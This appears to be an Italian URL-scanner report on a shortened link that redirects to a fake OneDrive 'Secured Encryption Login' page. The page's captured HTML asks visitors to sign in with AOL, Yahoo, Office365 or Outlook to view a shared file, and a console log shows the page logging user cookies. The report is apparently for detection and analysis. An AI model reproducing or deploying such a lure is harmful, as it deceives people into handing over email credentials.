https://cferainvest.live/securedencryptionbasedintfile/

URL inviato:
https://ln.run/60t1sReindirizzato
Report terminato:

Variabili JavaScript · 4 trovate

NomeTipo
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject
webpackChunkmy_appobject

Messaggi di log della console · 1 trovati

TipoCategoriaLog
logother
URL
https://cferainvest.live/securedencryptionbasedintfile/static/js/main.ab086597.js
Testo
User Cookie:

HTML

<!DOCTYPE html><html lang="en"><head><style type="text/css">@keyframes fade-in {
    0% {
        opacity: 0;
    }
    100% {
        opacity: 1;
    }
}

@keyframes fade-out {
    0% {
        opacity: 1;
    }
    100% {
        opacity: 0;
    }
}

@keyframes slide-down {
    0% {
        opacity: 0;
        transform: translateY(-15px);
    }
    100% {
        opacity: 1;
        transform: translateY(0);
    }
}

@keyframes slide-up {
    0% {
        opacity: 1;
        transform: translateY(0);
    }
    100% {
        opacity: 0;
        transform: translateY(15px);
    }
}

@keyframes zoom-in {
    0% {
        opacity: 0;
        transform: scale(0.9);
    }
    100% {
        opacity: 1;
        transform: scale(1);
    }
}

@keyframes zoom-out {
    0% {
        opacity: 1;
        transform: scale(1);
    }
    100% {
        opacity: 0;
        transform: scale(1.1);
    }
}

.modal {
    position: fixed;
    width: 100vw;
    height: 100dvh;
    top: 0;
    left: 0;
    display: flex;
    flex-wrap: wrap;
    flex-direction: column;
    align-content: center;
    z-index: 9999;
}
.modal__position-center {
    justify-content: center;
}
.modal__position-top {
    justify-content: flex-start;
}
.modal__position-bottom {
    justify-content: flex-end;
}

.modal__backdrop {
    background-color: rgba(0, 0, 0, 0.2);
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    z-index: 9999;
    opacity: 0;
    animation: fade-out 300ms forwards;
}
.modal__backdrop--blur {
    -webkit-backdrop-filter: blur(4px);
            backdrop-filter: blur(4px);
}

.modal__open .modal__backdrop {
    animation: fade-in 300ms forwards;
}

.modal__popup {
    padding: 20px;
    border-radius: 18px;
    width: 95%;
    max-height: 90vh;
    border: 1px solid #ddd;
    background: #fff;
    z-index: 99999;
    opacity: 0;
    display: flex;
    flex-direction: column;
    transform: translateY(-15px);
    overflow: hidden;
}

.modal__popup--animation-zoom {
    animation: zoom-out 400ms ease-out forwards;
}

.modal__open .modal__popup--animation-zoom {
    animation: zoom-in 400ms ease-out forwards;
}

.modal__popup--animation-slide {
    animation: slide-up 400ms ease-out forwards;
}

.modal__open .modal__popup--animation-slide {
    animation: slide-down 400ms ease-in forwards;
}

.modal__header {
    display: flex;
    justify-content: space-between;
    align-items: flex-start;
}

.modal__title {
    color: #000000c9;
    margin: 0 0 12px;
    font-weight: 600;
    font-size: 22px;
}

.modal__body {
    height: 100%;
    overflow-y: auto;
    flex-grow: 1;
}

.modal__close-button {
    cursor: pointer;
    border-radius: 50%;
    border: none;
    color: rgb(233 30 99);
    height: 32px;
    width: 32px;
    overflow: hidden;
    display: flex;
    justify-content: center;
    align-items: center;
    margin: -4px 0 0;
    background-color: #fff !important;
    transition-property: all;
    transition-timing-function: cubic-bezier(0.4, 0, 0.2, 1);
    transition-duration: 0.2s;
}
.modal__close-button:hover {
    background-color: rgba(0, 121, 211, 0.1) !important;
}

.modal__close-button-escape {
    width: 2rem;
    height: 1.6rem;
    background-image: url("data:image/svg+xml,%3Csvg width='16' height='7' fill='none' xmlns='http://www.w3.org/2000/svg'%3E%3Cpath d='M.506 6h3.931V4.986H1.736v-1.39h2.488V2.583H1.736V1.196h2.69V.182H.506V6ZM8.56 1.855h1.18C9.721.818 8.87.102 7.574.102c-1.276 0-2.21.705-2.205 1.762-.003.858.602 1.35 1.585 1.585l.634.159c.633.153.986.335.988.727-.002.426-.406.716-1.03.716-.64 0-1.1-.295-1.14-.878h-1.19c.03 1.259.931 1.91 2.343 1.91 1.42 0 4.256-.68 2.259-1.745-.003-.969-.733-1.483-1.744-1.71l-.523-.125c-.506-.117-.93-.304-.92-.722 0-.375.332-.65.934-.65.588 0 .949.267.994.724ZM15.78 2.219C15.618.875 14.6.102 13.254.102c-1.537 0-2.71 1.086-2.71 2.989 0 1.898 1.153 2.989 2.71 2.989 1.492 0 2.392-.992 2.526-2.063l-1.244-.006c-.117.623-.606.98-1.262.98-.883 0-1.483-.656-1.483-1.9 0-1.21.591-1.9 1.492-1.9.673 0 1.159.389 1.253 1.028h1.244Z' fill='%23334155'/%3E%3C/svg%3E");
    background-position: 50%;
    background-repeat: no-repeat;
    background-size: 57.1428571429% auto;
    border-radius: 6px;
    padding: 0.25rem 0.375rem;
    border: 1px solid #0f172a0d;
    -webkit-appearance: none;
       -moz-appearance: none;
            appearance: none;
    flex: none;
    font-size: 0;
    border-radius: 0.375rem;
    padding: 0.25rem 0.375rem;
}
.modal__close-button-escap kbd {
    display: none;
}
</style><meta charset="utf-8"><link rel="icon" href="./favicon.ico"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#000000"><meta name="description" content="Web site created using create-react-app"><link rel="apple-touch-icon" href="./logo192.png"><link rel="preconnect" href="https://fonts.googleapis.com"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin=""><link href="https://fonts.googleapis.com/css2?family=DM+Sans:ital,opsz,wght@0,9..40,100..1000;1,9..40,100..1000&amp;family=Plus+Jakarta+Sans:ital,wght@0,200..800;1,200..800&amp;family=Raleway:ital,wght@0,100..900;1,100..900&amp;display=swap" rel="stylesheet"><link rel="manifest" href="./manifest.json"><title>Secured Encryption Login</title><script defer="defer" src="./static/js/main.ab086597.js"></script><link href="./static/css/main.71ccb3db.css" rel="stylesheet"></head><body style="overflow: auto;"><noscript>You need to enable JavaScript to run this app.</noscript><div id="root"><section class=" bg-gradient-to-t from-[#2B74A7] to-[#123059]  bg-[#123059] dark:bg-gray-900"><div class="flex flex-col items-center justify-center px-6 py-8 mx-auto md:h-screen lg:py-0"><img class="w-[110px] mr-2" src="./static/media/onedrive-w.0706656dcd3f8364ba03.png" alt="logo"><a href="#" class="flex items-center font-raleway mb-4 text-2xl font-semibold text-gray-900 dark:text-white">OneDrive</a><p class="flex font-raleway items-center mb-0 text-[16px] font-light text-gray-900 dark:text-white">To read the document, please choose your email</p><p class="flex items-center text-[16px] mb-4 font-light text-gray-900 dark:text-white">provider below to Login to view shared file</p><div class="w-full bg-white rounded-lg shadow dark:border md:mt-0 sm:max-w-md xl:p-0 dark:bg-gray-800 dark:border-gray-700"><div class="p-6 space-y-4 md:space-y-6 sm:p-8"><form class="space-y-4 md:space-y-6" action="#"><button type="submit" class="w-full text-white bg-[#31459B] font-raleway hover:bg-primary-700 focus:ring-4 focus:outline-none focus:ring-primary-300 font-medium rounded-lg text-sm px-5 py-2.5 text-center dark:bg-primary-600 dark:hover:bg-primary-700 dark:focus:ring-primary-800 flex items-center justify-center space-x-2 transition-transform hover:scale-95 duration-300"><img src="./static/media/aol1.2d3b57383db53be1ed21.png" alt="icon" class="w-5 h-5"><span>Continue with Other Aol</span></button><button type="submit" class="w-full text-white bg-[#5F0F68] font-raleway hover:bg-primary-700 focus:ring-4 focus:outline-none focus:ring-primary-300 font-medium rounded-lg text-sm px-5 py-2.5 text-center dark:bg-primary-600 dark:hover:bg-primary-700 dark:focus:ring-primary-800 flex items-center justify-center space-x-2 transition-transform hover:scale-95 duration-300"><img src="./static/media/yahoo1.c2aa3b7a2cf57cd475fb.png" alt="icon" class="w-5 h-5"><span>Continue with YahooMail</span></button><button type="submit" class="w-full text-white bg-[#FF3C00] font-raleway hover:bg-primary-700 focus:ring-4 focus:outline-none focus:ring-primary-300 font-medium rounded-lg text-sm px-5 py-2.5 text-center dark:bg-primary-600 dark:hover:bg-primary-700 dark:focus:ring-primary-800 flex items-center justify-center space-x-2 transition-transform hover:scale-95 duration-300"><img src="./static/media/office3651.4a9f98fcd8f617b6e9be.png" alt="icon" class="w-5 h-5"><span>Continue with Office365 </span></button><button type="submit" class="w-full text-white bg-[#0073C8] font-raleway hover:bg-primary-700 focus:ring-4 focus:outline-none focus:ring-primary-300 font-medium rounded-lg text-sm px-5 py-2.5 text-center dark:bg-primary-600 dark:hover:bg-primary-700 dark:focus:ring-primary-800 flex items-center justify-center space-x-2 transition-transform hover:scale-95 duration-300"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABoAAAAaCAYAAACpSkzOAAAABmJLR0QA/wD/AP+gvaeTAAACuElEQVRIDbWUy2sUQRCHaza7Yp5GMYKPSECz0ZjoakAQYVEDgqIogoIgkpsgHsSr+AD9C9SziCCIQfQQRPSQFUkO4uPgAwVFCYgehJi4Mbig7VeTHtI7O7NZ12T4fV3VVTVd053eeCIzP8aYGqraIQMbQe2k53n78StSMlzFoouJbYFOWAc9kIZw7TCxipVk4V6qMxb92g788KKESsW7WtdYmimKFNj5hFBcrYZ4MQsz6aq2Tegwh4yz9m0Q3braueAJix7k2EawktDhP8jzroGwbhDYAa2c6wVs2UZvKXgGXyBSfO1zErthDFQ/GY4SP4I9ATkRWQ4SdRme8hV6rYN8gvkBGAVXehmWEmiCDDyGzVAH1yCQfxkkmFn70RjTpB2wa2AvNNt5L/4fCKSNskzeQ7et6cJ/B64iG/UJD1W7oACqNwzzCetHDZrpJ2ikke8M54wxajFF8hsldAGHAeufxqZAtZZhH6ge6BDBAmLnRUQtplRuozx/xG+2RBe3rm/S/igSezFsPta4v6Map+oH/iIINGGdOmvLmUmSL+A3dIIvt1EtJ9vGrj6JyCD0yfSTk6knM2Vix8tkzkA9NMIItEPJ9b6oQRougTvwCk7aWDP+KATSy9DN5KHlLHYF5OArvITPsFPfFxxXv5hs9xPOQCwF/eBqyCnRdTySj0B1i+EwqMYZVibdYvx5cJ/EFazeMP3Fb8A/DuuhnFaTzEIgPbZ+Jm0icijJEJY2O0VQwVSsFqeyFX8ZaKNtItKiW2YDVSl8dA2sMgZR2pOg26yI25pnoWNQAFfXyQ1EHZ1b9E8+C95kO695Sf97L8TeI3YX61/vDySrUdHR+YuVGZJ0XEWXFDVp6HHYhF8LsyIvbhWa67F2kHeb61VvIKYa5iO3qlMJsY2iXqa57ryLnO62nkaX8CvSXz8/5nLmw9eiAAAAAElFTkSuQmCC" alt="icon" class="w-5 h-5"><span>Continue with Outlook</span></button><button type="submit" class="w-full text-white bg-black font-raleway hover:bg-primary-700 focus:ring-4 focus:outline-none focus:ring-primary-300 font-medium rounded-lg text-sm px-5 py-2.5 text-center dark:bg-primary-600 dark:hover:bg-primary-700 dark:focus:ring-primary-800 flex items-center justify-center space-x-2 transition-transform hover:scale-95 duration-300"><img src="./static/media/other1.467aafc0fb3032c6f00b.png" alt="icon" class="w-5 h-5"><span>Continue with Other Mail</span></button></form></div></div></div></section></div></body></html>